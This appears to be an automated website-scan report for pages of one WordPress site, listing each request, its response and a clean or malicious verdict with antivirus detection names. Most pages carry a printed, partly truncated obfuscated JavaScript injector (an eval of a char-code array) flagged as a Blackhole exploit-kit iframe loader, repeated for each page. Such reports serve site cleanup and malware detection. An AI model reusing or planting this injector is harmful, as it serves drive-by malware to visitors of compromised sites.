Request | Server response | Status |
http://www.yeneiss.com/ | 200 OK Content-Length: 10013 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/wp-includes/js/comment-reply.min.js?ver=3.8.4 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://www.yeneiss.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: text/javascript | clean |
http://www.yeneiss.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.yeneiss.com/wp-content/themes/rackhost/js/jquery.cookie.min.js?ver=3.8.4 | 200 OK Content-Length: 975 Content-Type: text/javascript | clean |
http://www.yeneiss.com/wp-content/themes/rackhost/js/rackhost.js?ver=3.8.4 | 200 OK Content-Length: 16783 Content-Type: text/javascript | clean |
http://www.yeneiss.com/corporate1/ | 200 OK Content-Length: 10811 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/business-lines/ | 200 OK Content-Length: 15351 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/business-lines/yeneiss-plastic/ | 200 OK Content-Length: 11001 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/business-lines/it-solutionsservices/ | 200 OK Content-Length: 14952 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/business-lines/yeneiss-food/ | 200 OK Content-Length: 11198 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/business-lines/e-marketing-solutions/ | 200 OK Content-Length: 9551 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/services/ | 200 OK Content-Length: 9483 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/contact/ | 200 OK Content-Length: 8769 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|
http://www.yeneiss.com/test404page.js | 404 Not Found Content-Length: 7783 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,112,111,107,102,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,30,29,32,31,110,109,109,104,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,
... 930 bytes are skipped ...3,101,39,37,57,100,104,116,29,105,99,59,89,39,111,110,106,105,91,37,29,62,59,45,97,105,117,60,36,41,58,11,7,32,31,30,29,32,31,30,29,100,110,97,114,109,100,108,113,46,102,99,113,69,107,99,106,101,109,114,63,121,72,98,37,39,111,110,106,105,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,112,111,107,102,41,58,11,7,32,31,30,29,125,12,8,122,41,39,39,56,13,9);}w=f;s=[];for(i=0;-i+466!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));}try{document.body++}catch(gdsgd){e(s)}Antivirus reports:- AntiVir
- JS/Blacole.KH
- Avast
- JS:Decode-JX [Trj]
- Ikarus
- Trojan.Script
- nProtect
- Trojan.Script.480617
- Comodo
- TrojWare.JS.Iframe.AO
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- HEUR_HTJS.HDJSFN
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- Trojan.Script.480617
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.Script.480617
- AVG
- HTML/Framer
- GData
- Trojan.Script.480617
- BitDefender
- Trojan.Script.480617
|